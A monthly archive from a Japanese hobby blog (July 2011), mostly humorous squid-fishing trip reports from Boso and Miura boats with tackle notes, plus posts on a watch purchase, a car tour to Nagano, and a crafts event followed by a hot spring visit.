2011年7月のエントリー 一覧

2011/07/30 のイカ釣りin勝山萬栄丸

今週も!!文字通りってまいりました、安房勝山は萬栄丸からスルメ出船ッッ!!!バキューン!!

さ、意味不明の気合から入りましたが、館山道に入る手前でししょー&りえ姉連合軍の車をマリオカートよろしく抜いて快走。調子こいて車の中で熱唱し過ぎて港に着く頃には声がガラガラ・・・降っていた雨もぶっ飛ばして実はこの日港着から帰ってくるまで雨降らずで御座いましたよー。

当初1隻出しのスルメでしたが、急きょゆったり2隻出しとなり、18号さんにぱんつ屋てるお氏をヘッドハンティングされ、ワタクシは左舷から右舷ミヨシへと異動処分(笑)。
今日は知ってる方が多かったので朝から最後まで色々お話が出来て楽しかったですね。
徐々に雲が薄くなりつつある港を出発し、目指すは洲崎沖へ!
船長のアナウンスによるとその後に決戦の地白浜沖へと移動するとの事。気合十分。仕掛けも今日は1組作ってきたもんね~。

タックルはいつも通り、最近の俺の愛棒、違った相棒アルファタックル海人烏賊シャクリ125と先日からパートナーとなったシマノにゅーイカスペ。
どーしても喰いたかったので朝イチがっつりカレー。

開始した洲崎沖では、ぽつーんぽつん・・・な具合で、烏賊が先週に比べると小さい!って事は新群れか?などと言ってるうちに、作ってきたばかりの仕掛けが烏賊1杯と11本のツノごとバッツリ鮫島さんに持っていかれて朝からブルー・・・・・・・・_| ̄|○ il||li
い、いかん・・・(;・∀・)
なんとか9杯とったところで洲崎戦終了。
白浜沖へ移動開始。

IMGP0807.JPG

ししょーからの配給品(笑)。
ありがとございまーす。このキュウリの浅漬けが最高に美味かった!!!
ジップロックで作ってそのままクーラーボックスに入れて持っていけば良いって事は、実は手軽に作れて釣りのお供には最高なのかもね!次も宜しくお願いしまーす(え?)。

さぁ!白浜沖へ到着っ!
既に朝からこちらへ来ている洲崎早川丸の船上にズラリたなびく沖干し暖簾が最高に興奮させてくれます!!ぃぇぁ!!!

鯖がすげぇ!!!!!(=゚ω゚)ノ

はんっぱないっす!!(゚∀゚)ノシ
直結にもぶっ刺さってくるぐらい、30mくらいから下へ向かったドバババーーン!!!と鯖アタック!
その中をかいくぐって下へ到達!イカ・・・・・・
キタ━━━(Д゚(○=(゚∀゚)=○)Д゚)━━━!!
水深は170前後。底から20m~30mくらいが指示棚という場面が多く、時々140から下、とかね。魚に混じってイカが居たり魚の群れの下に居たり。

IMGP0808.JPG

こっちは立派にスルメだぜ!!

10時30分過ぎたあたりから破廉恥タイム到来!!!
ゆっくりとシャクリ上げてくると後から後から追い乗りだぁ!!(゚∀゚)キタコレ!!
久し振りだよコレ!!!

あぁ・・・・・・・きもちいぃ・・・・・・・・・・・。

いつまでのネッチネッチしゃくってからようやく巻上開始。
楽々モードに切り替えてさぁ上がってこい!!!
もったいないから竿掛けには掛けずに手で持って存分に引きを楽しんじゃうよ?(顔ゆるみっぱなし)
さー上がってきましたー♪
ここまでの戦績では最高3点掛け。このリミットを超えるぜ!!

ひとーつ・ふたぁーつ・みぃーっつ・よーっつ・いつーつ・むーっちゅ・ななーーーーーーーつぅ♪
イェ━━━━━ヽ( ゚Д゚)人(゚Д゚ )ノ━━━━━━イ!!
(;゚∀゚)=3ハァハァ興奮した!キモチヨカッタ!

次の盛り上がりで9点掛けるもなんと痛恨のバラシで3杯ぽちゃ・・・オーマイガーーーーーッッ!!!
なんて下手糞だよ俺!!ガッデム!!!
というか、取込みん時に手で外した烏賊が船べりすべってまた海へお帰りになり動揺してグダグダダダダ・・・あぁぁ・・・(笑)。

気を取り直して・・・・・・・ぎゃーーーーーーーーーまた鮫島に喰われたーーーーーーーー!!!!
あぁぁぁ・・・・・・。・゚・(ノД`)・゚・。
しめしめ自分だけ一杯獲れたぜ、と思って巻いてたら、喰われた・・・orz
しかし!!
一番下の角一本&オモリのロストなので急いで糸でスナップ縛ってオモリ買ってGO!

ゆけぇい!!!(#゚Д゚)(オモリ投げる時「てやっ!!」って言いながら投げた)
今日はちょっと慣れない左舷なのでオモリが思ってる方向へ飛ばぬのぅ・・・。

触った!掛けた!さぁ来い!!コイコイ!!
ネッチネッチネッチネッチ・・・・・・・・・・・・・・。
バットから海面と突っ込んでゆく竿!てかこの表現も久し振りじゃい!
ミリリ・・と音を立てる糸に興奮し過ぎてもうどうにかなりそうだよママン(*´Д`)ハァハァ
「きもちいいぃぃぃーーーーーーー!!!」
ほんとに海に向かって腹の底から叫んでみたよ。
そしたらやっぱりキモチヨカッタよ。

楽々モード システムチェーン、ジ(ガオガイガー)・・・頼むぞイカスペ!!(←このあたり全部声に出してしゃべってます)
ぎりぎり上がってきて竿かけて、身を乗り出して糸を掴んで!今度こそ負けん!!
水面下からゆらりとゆらぐ垂涎の花びら大回転~(失礼)。
ひとーつ・・・ふたーっつ・・・(さっきやったから略)・・・きゅーーーーーーーーー・・・

リベンジ成功。

先程の雪辱を果たすアハ体験
顔がデレすぎて船長に注意される(笑)。
「にやけすぎ」(大爆笑)
えへへあははうふふ・・・・・・・・

その後も7杯・5杯などなどあぁもぉぼかぁ幸せさー状態めくるめく官能の渦に飲み込まれて終了まで・・・・・何度もイっちゃった・・・。

IMGP0809_2.JPG

肝こーんなにデカく見事に成長しましたぞ!
周囲の方々から肝集めまくってジップロックたっぷたぷ♪毎度ありーで御座いますー。

IMGP0811.JPG

クーラー満タンぷらす。このカゴがぴったりみっつ入りますが、全部で5籠くらいかな。
72杯竿頭にて最高に気持ち良い一日が終わりでござる。
今日も皆様お疲れ様でした。

さて・・・

IMGP0810.JPG

先週から気になってるバッテリーですが・・・。
青ランプが左から番号ついてて1~5で、終わってみると前回と同じくこの状態。しかし!充電始めると3までいきなり点いて3番目がピッコンピッコン充電始めるんだよね・・・でも満タン状態だとちゃんと2番目も点灯してるわけで、どうなってるんかな、近々入院予定です。

で、気になるニューイカスペの限界に挑戦の話ですが、今回は残念ながら9杯掛けまでだったので限界点は未だ見えず。ただ、このイカスペはシマノのこのバッテリーを使うように開発されたものなのだそうで、100%の力を出す為にはこのバッテリーがマストアイテムとなるようです。
実際船電源もしくは他社バッテリーで動作させた場合、5杯程度で止まるとの事。
あとギリっとかけたら楽々モードにするのを忘れないようにね。

にゅーイカスペの楽々モードはフカセや先代のイカスペに比べて非常に力が強いようです、が、その分電力を消費するので要注意、だ。
いいねいいね、とても気に入りましたよ、このイカスペも!

次回釣行は日曜日になるかしらん

【おまけ】
ブログ書いてる間についったーで質問されたので覚書:
「多点掛けどうやってやってるんすか?」
人それぞれだとは思いますが、自分かなりネチネチしつこい感じ?
7から9くらいで巻きながらビシッとしゃくって、ゆーっくり戻す、の繰り返し。出来るだけ長く棚に仕掛けをおいとくイメージかなぁ・・・言葉で表現するの難しいですね・・(-"- )
顔は変な顔になります(これは不要か)。
口はとんがってます(これも要らんわな)。

2011/07/24 のイカ釣りin勝山萬栄丸

今週も~ッッ!!!ってまいりました、安房勝山は萬栄丸からスルメ出船ッッ!!!
死んだように寝て起きた日曜日。台風の去った後の海は如何でしょうか。

眠い目こすりながら勝山入り。昨日はちょっと寒かったけど今日は暑くなる予定なのだよね。でもカッパは要らなそうだ…と思ってカッパは今日はお留守番。
到着すると、おービックリ!今日は空いてる!!
Mr.Kはタチウオ船へ。
そしてワタクシ&ありんこ氏はスルメへ。
スルメ船なんと左舷5名、右舷4名で第一萬栄丸出発進行!!
そよそよと風吹くナギの海をひた走り、今日は洲崎沖へ直行便。後ろがちょうどありんこ氏なので朝イチから今日はオシマイまでシモネタ流しっぱなしノリっぱなしでそれだけでも体力使う(無駄な体力、だと?)

IMGP0798.JPG

いつも通り準備。
イカ釣りの基本として自分の釣座の前の部分は整頓してあまりモノ置かないようにするのも一つの上達術だと思いますが(携帯投げちゃう人も居るしね・・・)、自分この部分に一番最初に取り込んだツノを放り込むので、常に何もない状態にしてないと大変です。

最初に空振りするものの、3点掛けから幸先良くスタート。潮早いから今日も150号の錘ですが、いい加減慣れたのでもうなんとも思わないもんねープップクプー(頭の状態極めてわろし)。
洲崎沖では今日からスルメ開始の早川丸の親方が既にブイブイやってます、お久しぶりデス。
午前7時には11杯になってツヌケ達成。そろそろつぶやいても良いような・・・

「今日って実はイ・・・んがっくっく」(死亡フラグ自分でへし折った)

今のは気のせい(・ω・)ノシ
その後も多点掛けはないものの、堅実に獲り続けてちょっとずーつちょっとずーつナメクジのように進む事1時間後に久々にヌかずの4発キメて22杯。
なんかちょっともう結構満足してきた?!最近は朝イチとれないとそのままずっと獲れないままに最後まで流されてしまう一日が多かったので、今日は!今日は!今日こそ?!
そんな中ありんこ氏と上乗りのおとっつぁんとの会話らしきものの中で・・・
イカが触ってる話をするありんこ氏へ

「どっちの手で触ったァ?」
( ゚Д゚)ナヌ!?

・・・・・・・・・・・・わかるもんなのか?(大爆笑)
どうなんだ!?

腹の皮よじれてあやうく笑い死ぬとこだった、ふぅ危ない。
今日は結構忙しいよ?クルージングタイムがあんまりありませんで、真面目にやってます、真面目に。
10時には35杯と中年突破。

IMGP0801_2.JPG

沖干も最近見ないくらいきちんとイカ船ぽく揃う!ありんこ氏も御満悦ー。スルメのキモで卑猥な遊びをしてたのはここだけのハナシデス。へっへっへ。

11時頃にまた1山アタル。
6杯掛けで一気に40杯台へ突入。新イカスペ余裕で上げてきてくれます。潮が今日みたいに早くて何度も投入出来る時は是非直結でも毎回投げる事をお勧めします。自分にも周りに人にもオマツリ防止の為に良いと思います。普段1・2杯の時は普通にベシッと取込みしてますが、多点掛けした時は手でイカを外して取込みますデス。

IMGP0802_2.JPG

イカもだいぶでっかくなってきたので重量感タップリ!

IMGP0803_2.JPG

ありんこ氏も寝ながらタバコでヴァカンス状態。左舷から右舷に移動するのに「沖干暖簾」をくぐって入るこのヨロコビ!!!ヘ(゚∀゚ヘ)
暑いしやっぱり体力使うね~。
12時頃46杯になってからちと長かった・・・。一日洲崎沖に居ましたが、最後の流しで1杯追加。
本日は47杯竿頭にて終了です。

IMGP0804_2.JPG

さて、今日のタックルですが、ここ最近アルファタックルの1世代前の海人烏賊シャクリ150-125を愛用してます。長いのも好きなんだけど、短いのも使ってみると楽しいやね。とても気に入っている竿なので同じものを2本持ってます。そもそもガイドの付き方がこっちの方が好きだ。新しい方は軽いけどいまひとつやっぱり好きになれんのねぇ。
仕掛けは18センチのピカピカオンリー。
最初9本でやってたけどやっぱり13本にチェンジして後半ずっとそのまま。
新イカスペなのだけど、ちょっと気になるところがありまして、仮説が正しいかどうか今度の週末に実験します。実釣結果出てからここで話するよ。オタノシミニ・・・

家帰って畳の上で爆睡Ω\ζ°)チーン
次の土曜日にまた船の上でお会いしましょう!
皆様お疲れ様でしたー。

【物欲】これでもう電動リールは壊れまい...フハハ

皆様こんにちは、ついったーで鼻血ハッシュタグ"#hanadi"の登録をしたけーすけで、御座います。
如何お過ごしでしょうか。

欲しくて欲しくてずーっと欲しくて●年経過の腕時計を買うお金が貯まると必ず電動リールが壊れて散財→時計我慢…の法則がずっと続いてきた為、何かこれは対策考えないと永遠に欲しいモノが手に入らんぞ・・・。
と悩んだワタクシ。

今時計買っちゃえばいいんじゃね?

で、

2011072209290000.jpg

かっ・ちゃっ・た

でへへへ~♪
CASIO OCEANUS(オシアナス)シリーズ Smart Access Model OCW-T1000B-1AJF
うわぁんかっちょえええぇぇーーーーーー!!!
(;゚∀゚)=3ハァハァ

こ・・・これで・・・これで当分電動リールはくぁれないに、違いない。アハハエヘヘウフフフフフ・・・・・・・・(゜∀。)エヘヘへへへ。

※「暑いと頭おかしくなってる人が多い」 確かに、な

2011/07/18 のイカ釣りin勝山萬栄丸

今日もってまいりましたっ、安房勝山は萬栄丸からスルメ出船ッッ!!
そこにシビレるアコガレるぅっ!!(ジョジョ)

いやいや、連チャンでスルメに出れるなんて夢みたい~ヲホホホホ。天気は今日は少し曇りなので楽って言えば楽だよね。そして昨日とうってかわって・・・空いてます。台風のせいなのかな、いやいや連休の最終日だからかも。定刻通り岸払いした1号船は総勢6名のお客さんで、左舷は私を入れて4名。右舷は御夫婦の2名+今日は上乗りのおとっつぁんも竿出し、と。

IMGP0727_2.JPG

自分左舷ミヨシを昨日に引き続きで、左舷オオドモにグビモトさんの布陣。朝から楽しいねぇ♪

で、またまたナギです。
ナギ倒れ注意報緊急発令。

さてそれでは近場から最初の一投ヨロシクメカドック~♪(古いか)
おっとー?いいじゃんいいじゃん?
今日も1投目で1杯ゲット。恐ろしい・・・・・・・・・・これはまた・・・((((;゚Д゚))))ガクガクブルブル

2ストライク挟んでいきなり移動開始。
今日はサクっと近場を見限って沖へ。
移動後の1流しで4杯+1杯とれて計6杯へ。あれれ?

もしかして今日はイケてる?(またもや死亡フラグ

ちっとも学習しません、ワタクシ。また死亡フラグ立てまくり。その後ぷちぷち獲ってツが抜けるものの、そこからが・・・・・・・・きびしーーーー!!!><
今日は裏側に居るおとっつぁんとデッドヒートを繰り広げてますが、何かとても遅々として進まぬデッドヒート(笑)。
13杯~になってからがこれまた遠いだねぇ。

IMGP0728_2.JPG

そうこうするうちに潮がもうなんていうか手がつけらんないくらいに速度アップ赤マル急上昇。巻上時に船底こすりながらあがってくる~うわーん><

新品のWX8がーーーーーーーーーーーーー!!!

泣きながら巻上。
中オモリ40号にしたけどヤマなしオチなしイミなし・・あ、これは違うかwww
200mで底のはずが270m糸がデチャッテマスヨ(´・ω・`)

最後また近場へ戻って3点掛けやってジャスト20杯竿頭にて終了。
ちなみに結局最後までおとっつぁんと一緒に一進一退を繰り広げつつ同点ゴールw
おとっつぁんもグビさんも船長もお疲れ様っした!!

IMGP0729_2.JPG

スルメは立派なスルメになってるね、ふふふ・・・この引きはやっぱ最高だなオイ。

さて・・・・・・・昨日書かなかった電動リール 新イカスペのインプレなんぞ少し…てかもう既にあちこちでコメントされてるかもですが、ポイントいくつかさらっと。
・落ちは早いです 完全フカセと同等
・巻上速度やたら早いです 完全フカセより早い
・楽釣モードのパワーが完全フカセよりあきらかに強いっす
ずっと楽釣モードでやりっぱなしでも良いかもしれん。

ただ・・・・・・なんかレバーっていうかハンドルがえらい使いにくい。ニギリは良いんだよ、けど何なんだろうな、巻きづらい、と自分は感じるんだよね。あれどうにかならんのかな。
自分のフカセはニギリのところを変えてるからなのかもしれんが・・・あ、いやでもちょっとひと巻きで上がって来る量が違うように思うんだけど、気になったので調べてみた。
そしたらハンドル1回転で巻く量はどちらも同じ70cm。
同じなのかぁ・・・イカスペのニギリのところの回転が悪いんかなぁ。滑らない素材なのは嬉しいが、何かこうちょっと気に食わん。これはちょっと考える。

で、今日の釣り方研究~。
カットビ潮の巻。もうえらいこっちゃ糸が出て着底までが長いような時って、いつものように着底→2~3度大きくアオリ・・・なんてやっても意味無いしマツルのでそのままもう巻上開始しました。ガンガン電動シャクリしつつ巻きまくり。結果乗った。すごい角度で糸出ちゃって深い時って、ちょっとやそっとあおったぐらいじゃぁきっと仕掛けあんま動いてないんだろなーと思った結果でござる。中オモリ重い方がよさそうに思うけど、どうかね。
あとはもう通常運行ゆっくりズル巻きで触ったら即アワセ。
なんか今の烏賊ってちょい巻いてやらんとオサワリが出ない気がするなぁ。
とまあ試行錯誤で御座いましたヨ。
難しいね、そして楽しいやね~。

頑張った後は岩井海岸海の家でのんびりタイム。
今日は台風の影響で波が出てきたせいかサーファーの方が多いようかな?

2011071715040000.jpg

うへへへへへ・・・・部下クンにもらっちゃいましたYO でかいっしょ?!2.4キロありました、見事なキンメ。食べるのタノシミタノシミ♪有難う御座いま~す。

次の釣行は~24日の日曜日になるかな?
イカ釣りの為また一週間がんばりまっしょい!!

2011/07/17 のイカ釣りin勝山萬栄丸

今週も~ってまいりましたッ、安房勝山は萬栄丸からスルメ出船ッッ!!!
(;゚∀゚)=3ハァハァ
夏っていいですね・・・スルメとヌルヌル
あぁんもー想像しただけで白飯何杯もヌケるぜ!!…違った、イケるぜ!!

今日は釣り仲間の皆様方と一緒なのでワイワイというより大騒ぎしながら釣りが出来そうで早速タノシミタノシミ。土日はこれが良いよね!
前泊のぱんつ屋てるお氏・ししょー・リエ姉ぇと合流してミヨシでスタンバイ。

IMGP0716_2.JPG

風もそよ…っと程度で凪良く凪倒れ・・・いやいやゲフゲフ。
いざ出陣!!

洲崎沖へ・・・と思いきや、大きく進路変更して館山沖から開始。
おっと~1投目から幸先良くスルメげっちゅ~♪

「これは・・・今日はいけるかな?」(←死亡フラグ)

・・・と毎回思って毎回懲りずに死亡フラグ立てまくってヤラレてますがナニカ(笑)。

IMGP0717_2.JPG

何故か左舷ミヨシの樽が黒い樽
ヤラシイ。
スケベな感じ(俺の脳内がな…)。

そうそう、最初に大事な事言い忘れた。ここのところ潮がマッハの為、通常120号で統一のオモリですが、今回船長指令により全員150号を装備です。持ってない方には全員貸してもらえるので安心ですが、あらかじめ1個持ってくると良いかなと思いますヨーン。

150号だと重い重いって聞くけど正直あんまり変わらんと思う。120号で中オモリ30号なら変わらないし、むしろ重いと思うのは潮が速い時に使うから潮の分重いだけかもしれないね。

さて、最高4点掛けがあるものの、そうこうするうちにポツンポツン、とも釣れなくなってきて場所移動ー。
太陽サンサンーーー!!!
あづい・・・・・・・・・・・・・・・・・・・・・・・・・。
海はベタ凪。
遊覧船状態が増えてきて・・・

IMGP0719_2.JPG

てるお氏いつものロダン(※考える人像)体制にw。

そして潮がいよいよ早くなります。

IMGP0720_2.JPG

ミヨシどころかツキンボへ移動(笑)。この場所久し振りデスネ。今日は片舷10名・9名と混んでるので釣り座広げるためお立ち台へ。

気が付けば死屍累々

IMGP0724_2.JPG

話相手が居なくなった・・・。
そして私は・・

IMGP0725_2.JPG

樽の中入りっぱなし。樽の中に脚突っ込んでると良くわかるのですが、館山沖ではまだひゃっこい水が洲崎沖を過ぎてさらに沖へ南下するとヌルくなります。体感出来るくらいの温度差なのだね・・・。ボク今日この樽から出れませんでしたヨ。
で、いつもよりまくってしまったパンツによって膝の上の絶対領域が真っ赤に燃えた一日でした・・・イタイヨーイタイヨー><。

後半まったく・・・・・・・・釣れずorz
トータル21杯の竿頭にて終了~ぅぅぅ。

でもなんていうか、やっぱスルメは楽しいよ!!どうやって掛けてやろうか、って思うのがやっぱり一番楽しいやね。
明日も頑張るぞー!!!
明日はもちっと詳しく書けるかなー。イカスペのインプレやら釣り方ナニやったかとか明日の分にまとめちゃえー・・・・・ねむ・・・・・・・・zzz

【電動リール】駆け込み購入&情報収集【久々購入】

皆様こんにちは、夜勤明けに車であちこち渋滞突っ込んで意識朦朧のけーすけで、御座います。
如何お過ごしでしょうか。

世間様は今日から三連休ですが、あんまり関係ないので、ワタクシは今日は夜勤の明けで御座いました。

2011071611180000.jpg

サブウェイでターキーブレスト(バジルマヨネーズソース)詰め込んで急いで帰宅。そのまますぐ駐車場からレッツらGo west!
先日壊れた電動リール「完全フカセSP」を入院させるべくFFTことフジモリ・フィッシングタックルへ。
東名があり得ないくらい混んでるので下道へスイッチし、裏道街道まっしぐら。町田駅かすめてなんとか到着。暑いわ眠いわ死にそうだわ・・・。
そういえば知らない間にフジモリさんはHP開設していた模様。「メンテナンス」のページに各電動リールのメンテナンスの仕方が詳しく載っているので、シマノの電動リールをお使いの方は一読されるのが良いかもしれないね。特にウォームシャフトの付け根にベアリングが入っているタイプのリールは要注意。

はいはーい、到着しましたーちわっす三河屋っすー・・ガラガラ。

2011071615080000.jpg

…フジモリ氏ちょっと見ない間にえらくちっちゃく白くなったような・・・うそうそ(^^;)。
他にお客さんも居なかったので、小一時間情報交換。
完全フカセSPL無事入院。
新たなイカ釣り強化指令を頂き店を後にした・・・まいどありー。

IMGP0713_2.JPG

買っちゃった~でへへ~電動丸イカスペシャル
完全フカセが戻って来るまでの間、旧イカスペだけでは心もとないので新イカスペ購入毎度ありがとうございますー。4号のWX8を400m巻いて新品完全武装。攻撃力・すばやさ・防御力アップ!!
目ん玉の悪い自分には液晶の数字がでかいのが大変有難いデス。
今回高切れボタンというのがあるようで、これが大変便利なのだそうです。深場で使っているとどうしても狂ってくるので、毎回これで調整してあげると良い、らしい・・・・・・・・いまひとつ理解が出来なかった私が言うのもナンですが(笑)。

IMGP0715_2.JPG

そんな私にも海へ一緒に持って行って濡れても大丈夫な高切れ調整のラミネートしたカンペがFFTで購入するとついてきます、芸が細かいなぁ(^^)。
さらにドンくさい私には「風で吹っ飛ばしても良いように」カンペもう1枚頂きました、いつも有難う御座います~。

さ、急いで準備して、明日・明後日は2日間イカ釣りっすよー。
え?台風?
それは行ってから心配する事としますー。

【車】久々異種間交流ツーリング【避暑】

皆様こんにちは、愛車の水温計から目が離せないけーすけで、御座います。
如何お過ごしでしょうか。

くそあっちー季節になると毎年コレですよ。車の色もアレなんですが、目玉焼きどころかボンネットで焼き肉出来る事間違いなし。走ってる間や止まっている時水温計から片時も目が離せませぬ。

昨夜会社の飲み会だったにもかかわらず、今日は車オフで御座います。
車オフなんてすごい久し振りだよ!!
職場の皆様方ですが、今回欲しかった愛車購入した早坂さんを記念して4台体制でツーリング。こう暑くっちゃたまらんぞ、という事で避暑地を目指します。お目当ては長門牧場のソフトクリーム。

午前7時に関越道高坂SAに集合・・・・・ね・・・・・眠い・・・・・・もうめっちゃ眠い・・・。4時に朝起きたんだが2度寝の激しい誘惑に打ち勝って冷蔵庫へ飲み物探しに行ったところで、中に入ってるギンギンに冷えたビール見て「これ飲んでこのまままた寝たい」誘惑が・・・ww
いやもー家出るのに一苦労。
朝早いので駐車場でエンジンかけたら速攻で出発。ガソリン満タンだし車も綺麗なのでこのまま行きますかね・・・こんな朝早くなのに環八はもう結構車が居る。
まぁ、いつも釣りに行く時は朝というよりは夜中だもんね、家出るの。
今日は自分1号愛車で出撃してます。暑いからコペンで・・・と思ったけどダメダシされたのでスカイラインHR34。

特にトラブル無く関越に乗って今日は極力(いつも以上に!)安全運転で高坂到着。
まだ誰も来てないので中に入ってだらだらついったーしながら休憩。こんな朝っぱらから「カツ丼」やら「ソーキそば」結構皆ガッツリ系の飯食ってて「朝定食」がほとんど出ないのにはちょっと引いた。

朝御飯がっつり食べないと燃料切れになる人間なので皆が来るまでオアヅケ状態でぐったり・・・はらへったなう・・がひたすら続く・・・。
そうこうするうちにようやくhiroアテンザ到着。話し相手が出来た。
続いてニコ生中継しながらばびちゃとFit到着。んで最後に真打早坂レクサスIS到着。ようやっと朝ごはんにありつけた。

朝カレー

朝からカレー。イイですね。グッドチョイスです。
食べたらとりあえず出発。次の中継地点横川SAまでなんとなく写真とりながら、走る。

IMGP0690.JPG

全員集合ー・・・全員メーカーが違うwww

ここからは結構目的の長門牧場は近いんですよ。
佐久ICで降りて下道をだらだらっと走行。走行中後ろからニコ生されてるにも関わらず色々アレコレナニナニ・・・www 電波の悪いところでヨカッタです、てへ♪

IMGP0694.JPG

長野県 長門牧場到着ー。
早速ソフトクリームを食す。溶けてしまうのでデジカメ撮影なし!!そういえばいでぼくのジェラートも最近食ってないなー・・寒くなってからの方がゆっくり食べれていいんだけどね。

IMGP0696.JPG

広がる景色・・・夏の空。
東京と違ってそよぐ風は涼しく快適・・・・・・・・・・・・・うとうとうと。

IMGP0700_2.JPG

ベンチに寝っ転がって見上げた空最高ー・・・うとうとうと。

IMGP0702_2.JPG

そのまま横向いてだらけきった体制で撮影。こんなゆっくり時間もいいものだよね、このままずっと寝てたいぜ。

お昼前に移動開始して山降りて今日は昼飯は長野なので蕎麦です。

IMGP0704_2.JPG

店の名前忘れちゃった・・・。
水蕎麦が出るのでいいですね!これうまかったです!!
ツユじゃなくて冷たい水で食す蕎麦なんだけど、蕎麦と水が美味しい(蕎麦が美味しいって事は必然的に水も美味しいんだけどね)ところでだけ食べれますが、以前山形で喰った時も爽やかでめっちゃうまでした。
美味しくツルツルーっと御馳走様~♪

諏訪のあたりまで降りてきてたので、そこからまた最後の目的地美ヶ原を目指してビーナスラインを登ります。白樺湖で「暑いーーーーーーーー死ぬーーーーーーーー」休憩をしてから標高の高い方へ。
うちの車ほんとヤバイくらい暑いよ・・・運転手煮えちゃうよ><。

雷雲に追い立てられるように美ヶ原へ到着。寒いくらい?標高2000m級の高原でお土産買ったりだらっとしたり・・・というより雷雲がヤバイですよ。
あっという間に上ってきて目の前で美しいイナヅマが見える様子は圧巻です。瞬く間に駐車場も雲の中・・・・。

山の天気はすごいよね、と言ってるうちにまた雲が晴れる・・・。
記念に自分が車の中で一番好きな角度で4台撮影~。

IMGP0706_2.jpg

この角度の顔が可愛い可愛い・・・しかしFITが一番可愛いなぁ・・・。

ここで今日のツーリングは解散。
帰りは関越までhiroアテ子のケツ拝みながら下山。
そういえば持ってきてた無線機が壊れてたのがちょっと残念だった、というより買ってからあんま使ってないのに壊れてるってどーゆー事よ。

2011071217070000.jpg

次何買おうかなぁ・・・・っていうか最近散財多くない?!

皆様、お疲れ様っしたー。

【イベント】第32回あらかわの伝統技術展 のお手伝い【風呂】

皆様こんにちは、梅雨明け宣言でさらに夏気分加速のけーすけで、御座います。
如何お過ごしでしょうか。

いいですね、きらめく太陽、そして白い雲、青い空、黒いスルメ・・・。
さて、それはおいといて、掲題のイベント『あらかわの伝統技術展』の時期となりました。前々回は立派に母上様の手伝いでお師匠様へのサポートを果たしたものの、去年は痛恨の欠席。痛恨・・・てか渋谷某所で酔っ払って階段からゴシャ・・・っと落ちて足ねんざしたわけですね、ごめんなさい。
今年は頑張ります!

ということで、朝6時過ぎにレンタカー借りてきて出発。
こちらのイベントは毎年荒川区で行われておりまして、荒川の伝統工芸の技をマイスターの方々が披露するというイベントです。これ参加出来るものも結構ありまして、なかなか一日楽しめるんですよ。
で、母上の和裁の中村さだ子先生がこのマイスターですので、自分色々お手伝いで運転手、で、あります。

IMGP0585_2.JPG

じゃーん。
今年先生に手掛けて頂いた市松人形の衣装です~。素晴らしいですね、柄合わせがまたすごい・・・。実はこの着物、私の七五三の三つの時の着物でして、それをこのように市松人形の服に仕立てなおして頂きました。他にも帯はおかんの帯だったり、と思い出詰まった一品をこのように素晴らしい仕上がりで作品にしていただきました、先生有難う御座いますー!!

さて、運転手は帰りの片付け時間までは自由時間なので、早速あちこちまわる。

IMGP0664_2.JPG

去年兄上と母上がやってた木目込人形にトライ。来年の干支なので龍で御座いますな。左側がお手本で、木の屑を固めて作った土台に、ボンドを少量付けて布をあて、さらにそれを専用の工具で埋め込んでいきます。

IMGP0666_2.JPG

昨日のイカ釣りの後遺症(ツノ刺した)で絆創膏だらけの手で失礼w
始めると集中してしまう気質なので無心に黙々と作業。こういう時はまわりの音とか全然聞こえませんです。

IMGP0683_2.JPG

でけた!!
初めてにしてはなかなか?(笑) 来年もまたやろうやろう、自分の干支だし。
まぁ・・巳年はいつも「うんこ」みたいな外観になる事が多いのであまり期待はしませんがね…。
何度嫌な目にあったことか・・・(遠い目)。

続いて指物(和箪笥とかだよ)のマイスターのところで自分だけの箸制作。

IMGP0590_2.JPG

シャコシャコ磨いてます。これまた無心で一生懸命。

IMGP0670_2.JPG

マイスターの根本氏です。
手前に写っているこの小さなカンナで作りましたが、こうした道具は御自分で作るのだそうです。
ちなみにこの小さなカンナ、実は大きなカンナから切り出してリサイクルして作成したものだそうだ!
色々有難う御座いました~。

たっぷり楽しんで、先生と荷物をおうちへ届けた後は、当然、風呂。
今日のレンタカーはホンダ INSIGHT
初めてハイブリッドカー?を運転してみたが、結構難しいのね、コレ。
っていうかそもそも普段自分の車は2台ともMT車なのでATの操作がまずちょっとつっかえる。ギアのところに「S」って書いてあって「なんぞ・・・?」とついったーでつぶやいたところ、数々のものすごい御回答有難う御座いましたww まともなコメントが1個って・・・(笑)。
普通にブレーキ踏んで止まると回転数がストーンとゼロになってたまげた。

東北道へのって北上し、今日は矢板のICで降りますよ~。
ふつーの地方の道を通って、そのうち角曲がった途端に急にまわりは全部田んぼに・・・。
あ、やっぱりいつもの道無くなっちゃうパターンか?
と思ったら、やっぱりそうでした~。
センターラインはおろか両側から草が生い茂ってイイカンジ♪
【本日の一湯入魂】
栃木県 寺山鉱泉

IMGP0673_2.JPG


大きな地図で見る


秘境です。
違った、秘湯です(笑)。
宿までのラスト700mは高低差があったらかなり酷道かも。
丁寧に歓迎していただき、いざ風呂へ。ちなみに日帰り時間は夕方6時30分から21時までのようで、遅くまでお願い出来るところに目をつけました。

IMGP0676_2.JPG

おっしゃあああ!!!
いいねいいね、風呂ーっっこの状態。

IMGP0677_2.JPG

御開帳~っっっ!!!
鉄分のお風呂ですな。ちなみに風呂全体の作りから、以前は一つにつながっていた混浴と思われますが、現在それを真っ二つに脱衣所ともども分断したような作りになってます。
で、

IMGP0678_2.JPG

インターフォンが、あります。
お湯がぬるくなったらこれ押します。するとボイラーで炊いた暑い温泉が出てきます。
もう一回押します。すると止まります。
けど人力なので中の人がお湯沸かして入れてくれるみたいです、何かほんわかしますね。

しっかりつかってあっつあつ。
外は当然真っ暗で虫がえらいいっぱいいたので急いで車内へ退避。ボンネットにカエルがのっててちょっとびっくりした。
帰り道も700m怖いね。

IMGP0682_2.JPG

こぉ~んなかんじぃ~☆
でも自分がいつも行く温泉ていっつも最後こんな道になりますよ。

2011/07/09 のイカ釣りin長井新宿小見山丸

今週はー!!!~ッてまいりました、烏賊釣りメッカ長井新宿から小見山丸でスルメイカ出船!!
今週は萬栄さんの勝山が祭礼の為出船出来ないので、スキルアップ研修の為に長井へ修行に参りました。ステップアップして攻撃力高めるぜーぃ!!(スルメ釣りと車の運転の研究だけは一生懸命)

なんといっても前回の痛い失敗(目的地見つからず)がありますので、事前準備は念入りに。
ついったーのフォロワーさんに御紹介頂いたので、DMで事前打合せして色々聞き込み操作。さらに場所も何度も確認し、グーグルのストリートビューでバーチャルうろうろして準備万端。
と、思いきや、肝心の出船時間の確認してなくて前夜プチパニックだったのはここだけの、話。

やっぱり初めての場所は実はいつでもとても緊張しまっすよ。
